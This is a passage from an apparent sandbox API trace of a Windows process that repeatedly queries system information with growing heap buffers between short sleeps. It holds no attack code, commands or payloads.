(dwMilliseconds=0x110) [0282.858] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0282.859] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.859] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0282.859] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0282.859] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.860] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0282.860] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0282.860] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.860] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0282.860] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0282.860] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0282.861] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0282.861] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0282.861] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0282.861] Sleep (dwMilliseconds=0x110) [0282.882] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0282.882] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.882] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0282.882] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0282.882] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.883] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0282.883] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0282.883] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.883] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0282.883] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0282.883] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0282.884] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0282.884] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0282.884] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0282.884] Sleep (dwMilliseconds=0x110) [0282.888] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0282.888] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.889] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0282.889] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0282.889] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.889] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0282.889] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0282.889] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.890] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0282.890] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0282.890] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0282.890] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0282.890] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0282.891] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0282.891] Sleep (dwMilliseconds=0x110) [0282.908] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0282.908] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.909] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0282.909] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0282.909] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.909] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0282.909] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b770 [0282.910] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b770, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b770, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.910] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b770 | out: hHeap=0x2560000) returned 1 [0282.910] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0282.910] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0282.910] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0282.910] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0282.911] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0282.911] Sleep (dwMilliseconds=0x110) [0282.937] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0282.937] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.938] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0282.938] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0282.938] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.938] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0282.939] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0282.939] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.939] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0282.939] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0282.939] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0282.939] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0282.939] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0282.940] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0282.940] Sleep (dwMilliseconds=0x110) [0282.951] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0282.951] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.951] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0282.951] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0282.952] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.952] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0282.952] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0282.952] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.952] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0282.953] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0282.953] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0282.953] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0282.953] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0282.954] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0282.954] Sleep (dwMilliseconds=0x110) [0282.970] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0282.970] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.970] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0282.970] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0282.970] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.971] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0282.971] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0282.971] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.971] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0282.971] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0282.971] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0282.972] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0282.972] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0282.972] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0282.972] Sleep (dwMilliseconds=0x110) [0282.983] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0282.983] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.984] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0282.984] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0282.984] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.984] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0282.984] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0282.984] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.985] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0282.985] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d260 [0282.985] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d260, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d260, ResultLength=0x19ee88*=0xc0) returned 0x0 [0282.985] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d260 | out: hHeap=0x2560000) returned 1 [0282.985] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0282.986] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0282.986] Sleep (dwMilliseconds=0x110) [0283.004] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0283.004] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.005] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0283.005] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0283.005] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.005] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0283.005] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0283.005] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.006] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0283.006] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0283.006] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0283.007] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0283.007] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0283.007] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0283.007] Sleep (dwMilliseconds=0x110) [0283.040] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0283.040] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.041] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0283.046] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0283.046] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.047] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0283.048] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0283.048] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.049] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0283.049] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0283.049] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0283.050] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0283.050] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0283.051] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0283.051] Sleep (dwMilliseconds=0x110) [0283.179] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0283.179] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.180] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0283.183] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0283.183] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.184] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0283.189] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b510 [0283.189] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b510, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b510, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.190] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b510 | out: hHeap=0x2560000) returned 1 [0283.190] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0283.190] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0283.190] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0283.194] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0283.194] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0283.194] Sleep (dwMilliseconds=0x110) [0283.220] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0283.220] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.221] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0283.221] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0283.221] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.221] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0283.221] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b9d0 [0283.222] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b9d0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b9d0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.222] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b9d0 | out: hHeap=0x2560000) returned 1 [0283.222] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0283.222] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0283.223] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0283.223] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0283.224] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0283.224] Sleep (dwMilliseconds=0x110) [0283.231] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0283.231] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.232] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0283.232] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0283.232] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.232] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0283.232] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b9d0 [0283.232] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b9d0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b9d0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.233] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b9d0 | out: hHeap=0x2560000) returned 1 [0283.233] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0283.233] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0283.233] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0283.233] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0283.234] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0283.234] Sleep (dwMilliseconds=0x110) [0283.255] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0283.255] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.256] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0283.256] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0283.256] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.256] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0283.256] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0283.256] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.257] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0283.257] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0283.257] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0283.257] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0283.260] RtlAllocateHeap (HeapHandle=0x2560000, 